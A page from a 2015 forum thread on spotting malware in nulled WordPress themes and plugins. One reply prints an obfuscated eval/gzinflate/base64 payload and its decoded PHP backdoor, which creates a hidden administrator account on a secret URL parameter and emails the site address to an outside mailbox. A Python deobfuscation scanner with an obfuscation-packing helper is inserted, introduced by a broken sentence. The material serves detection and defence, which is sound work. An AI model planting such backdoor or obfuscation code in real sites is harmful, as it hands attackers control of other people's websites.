06-27-2015, 10:23 AM
Post: #21
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
When I downloaded exploit scanner from here...

http://wordpress.org/extend/plugins/exploit-scanner/

and scan with virus total ... said

Bkav VEX6466.Webshell

Is it some sort of backdoor?
06-30-2015, 05:16 AM
Post: #22
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Wow.. I learned something new here.. Thanks OP
07-18-2015, 03:19 PM
Post: #23
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Nearly all my plugins have malicious code -_-
Should I delete them all?
07-18-2015, 09:57 PM (This post was last modified: 07-18-2015 10:02 PM by jethroucc.)
Post: #24
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Pl...
(07-18-2015 03:19 PM)tajin Wrote:  Nearly all my plugins have malicious code -_-
Should I delete them all?
Yes, highly suggested.. Odd question really.

To add to the OP's post, another great tool to scan your wordpress plugins/themes is GOTMLS Exploit Scanner. Very similar to the one listed already, this one has more active updates and is easy to update, and has a LOT more definitions and (in my opinion) better detection.

But it's HOW you detect this shit - Most malware in these plugins and themes used encryption (mostly base_64) to hide themselves.. Essentially, if the other scanning plugin doesn't have the known viral definition, it won't pick something up.

This one not only can detect more known, but also lets you check "potentially compromised" scripts by looking for some key things that may be malware (eval(base64_decode or <?php echo stripslashes($wpl_header_desc); ?> uses) and lets you examine them a little closer.

BUT - some scripts use these kind of functions for normal, legit purposes. So how to tell? So our script finds something that may be suspicious. It finds a line that contains the following code:
Code:
eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9​a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCO​BjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP​17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL​8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );

That's a lot of decoding for a script to do isn't it? Lines like this need to be looked at closer. Some decoding work (well, a lot to be honest. no one said this was gonna be easy) reveals:

Code:
add_action('wp_head', 'my_wpfunww7x');
function my_wpfunww7x() {
    // Backdoor trigger: any page request with ?cms=jjoplmh creates a hidden admin account
    if ($_GET['cms'] == 'jjoplmh') {
        require('wp-includes/registration.php');
        if (!username_exists('wordpress')) {
            $user_id = wp_create_user('wordpress', 'gh67io9Cjm');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
add_action('wp_head', 'my_wpfunww7c8');
function my_wpfunww7c8() {
    // Until that account exists, every page load emails the site URL to the attacker
    if (!username_exists('wordpress')) {
        $addressdecode = "thomasza@gmx.com";
        $vari = 'Wordpress Plugin';
        mail($addressdecode, get_bloginfo('wpurl'), $vari);
    }
}
Which of course should be fairly easy to tell that some asshat is attempting to make a new user, set that user as an admin, then email himself the good news.

Decoding these scripts is the tough part here. Takes some decent understanding of PHP, and how to obfuscate/deobfuscate, potentially using several different types of encryption, and possibly having to follow a path of different PHP scripts being used together. If memory serves me right, this encoded statement was itself, encoded, inserted into another script, and then pointed to by yet another..

Thankfully, it can sometimes be easy to tell if a script is legit or malicious. Sometimes encryption is minimal enough, or a more simple method is used, or not at all. Don't assume that just because a statement is short, however, that it's safe. You'd be surprised what you can fit into a piece of code 5% this size. Also, your friend google can help you here again. You can quite literally pop a string into google (surrounded by "quotes"), and it will likely return results, which may point to a script being clean or not.

While it's possible to explain the steps involved in the encoding/decoding process, it would have to be its own thread at the very least, and would take hours to write out something cohesive enough to call a "guide". Rather, I'll suggest hitting google. "encode/decode" and "obfuscate/deobfuscate" are gonna be helpful keywords. And frankly, I'm still not the best at it. The script above was a "practice" script for me years ago, but I can't find the link to the site that explained the whole process.. Will post it later if I can.

One last thing - If you are unsure (and I mean ANY doubt exists in your mind) that a script isn't clean.. DO NOT USE IT. "Well couldn't I just put it on a shared host?". Yes, you d****. You could, but don't be part of a giant sub-section of web users that contributes to free hosting being shut down across the world. The reason free hosts nowadays are such shit is because of crap like this and webshells.

You can scan the PHP files individually (or search I should say?) for things like "base64 _decode" or "gzinflate". Get tricky with it, try "edoced_46esab" and so on. Too much work (slacker)? Run it locally, using a webserver (like WAMP for windows users, XAMPP for linux, or, for people uncomfortable with setting up even those two, AAMPS), which will also let you monitor the actual traffic and inbound/outbound connections being utilized by PHP and HTTP queries.

If there is a real need or desire for a guide to be written on the subject in detail, and enough people express an interest, I may write one up. Or maybe one of our amazing crackers (and experts compared to myself) programmers/crackers could write one out, I would be happy to help with such a project to say the least. Be safe, don't use scripts from MOST sites giving them away free (what is the benefit to the site exactly?), and always keep an eye out for suspicious activity anywhere you may have used one or part of one at any time. And don't be lazy. That's why shit like this has a place to happen in the first place.

Rep's always appreciated, contributing takes time! Support your contributors like they support you!
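The detection approach this post describes (grep for eval/gzinflate/base64_decode and the reversed "edoced_46esab" trick, then peel the wrapper to see what the payload actually does) as an added example of my own, not code from the thread or from any scanner plugin named in it. It unwraps eval(gzinflate(base64_decode("..."))) layers statically, without executing PHP, and then checks the decoded text for the behaviour the decoded backdoor above showed; the packed sample at the bottom is constructed here purely as a test fixture, and the indicator list is an assumption of mine.

```python
import base64
import re
import zlib

# Added example: static peeling of eval(gzinflate(base64_decode(...))) wrappers, never executing them.
SUSPICIOUS_CALLS = ("eval(", "gzinflate(", "base64_decode(", "str_rot13(", "gzuncompress(")
REVERSED_CALLS = ("edoced_46esab", "etalfnizg")  # the strrev() trick the post mentions
POST_DECODE_INDICATORS = ("wp_create_user", "set_role('administrator')", "mail(", "$_GET[")  # assumed list
# Wrapper chain (outer to inner) plus the quoted blob; tolerates the "base64 _decode" spacing seen above.
LAYER = re.compile(
    r"eval\s*\(\s*(?P<chain>(?:(?:gzinflate|base64\s*_decode)\s*\(\s*)+)[\"'](?P<blob>[^\"']+)[\"']"
)

def _decode_chain(chain: str, blob: str) -> bytes:
    data = blob.encode()
    for fn in reversed(re.findall(r"gzinflate|base64\s*_decode", chain)):  # innermost call runs first
        if fn.startswith("base64"):
            data = base64.b64decode(re.sub(rb"[^A-Za-z0-9+/=]", b"", data))  # drop stray/zero-width chars
        else:
            data = zlib.decompress(data, -15)  # raw DEFLATE, which is what PHP's gzinflate reads
    return data

def peel_layers(src: str, max_layers: int = 10) -> tuple[str, int]:
    # Returns (innermost recovered text, number of wrapper layers peeled)
    layers = 0
    while layers < max_layers and (m := LAYER.search(src)):
        try:
            src = _decode_chain(m.group("chain"), m.group("blob")).decode("utf-8", "replace")
        except (ValueError, zlib.error):
            break  # not really base64/deflate: stop and report what was recovered so far
        layers += 1
    return src, layers

def scan_source(src: str) -> dict:
    # Flag obfuscation calls (whitespace removed, reversed names included), then inspect the decoded code
    decoded, layers = peel_layers(src)
    return {
        "suspicious_calls": [c for c in SUSPICIOUS_CALLS if c in re.sub(r"\s+", "", src)],
        "reversed_calls": [r for r in REVERSED_CALLS if r in src],
        "layers": layers,
        "indicators": [i for i in POST_DECODE_INDICATORS if i in decoded],
    }

def _pack(php: str) -> str:
    # Test-fixture helper only: wrap text the way the thread's sample was packed (constructed, not real malware)
    co = zlib.compressobj(wbits=-15)
    raw = co.compress(php.encode()) + co.flush()
    return f'<?php eval(gzinflate(base64_decode("{base64.b64encode(raw).decode()}")));'

# Constructed sample with the decoded snippet's behaviour, packed twice (nested, as the post recalls)
INNER = "<?php if ($_GET['cms'] == 'x') { $u = wp_create_user('wordpress', 'pw'); $user = new WP_User($u); $user->set_role('administrator'); mail('x@example', get_bloginfo('wpurl'), ''); }"
SAMPLE = _pack(_pack(INNER))
```

Running scan_source over each .php file of a downloaded theme gives the same signal the post describes: a non-zero layer count combined with user-creation or mail indicators in the peeled text is the thing to look at closely.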
07-19-2015, 10:58 AM
Post: #25
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Everyone should get the following to monitor their Wordpress installation:
1. Wordfence
2. Bruteprotect
3. Web host with additional file/hack monitoring

If you download shares from blackhat forums or anywhere else, you have to check for traffic stealing malware, or malware that loads ads, or uses your hosting to launch attacks on other sites. Ask Wordfence or Sucuri to check your files for all types of malware which are hidden in .png files, cURL and other scripts.

Last year I downloaded MyMail from a user here called Jezuz and the next day my WP stats showed that I lost a lot of traffic. Ever since, I buy my own plugins and themes. Blackhatters use these forums to distribute their malware code and if one site on a server is infected ALL SITES ON THAT SERVER ARE INFECTED AND ARE USED BY THE THIEVES.

Anytime you download shares, especially those that state "Always Updated", then be leery of the bas_urd sharing. You have been warned.
07-22-2015, 12:35 AM
Post: #26
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Very Useful Article thank you for sharing it with us it is such a useful article nowadays!
07-24-2015, 01:30 PM
Post: #27
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Thanks intrepid for the tip. Good plugins, I tried Wordfence.
07-24-2015, 06:37 PM
Post: #28
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Great thread, thanks a lot
07-24-2015, 08:18 PM (This post was last modified: 07-24-2015 08:19 PM by sfenix.)
Post: #29
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
useful information, thanks
rep added
07-25-2015, 09:22 AM
Post: #30
RE: Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins
Thank you for the help on finding that horrid WPlocker crap ..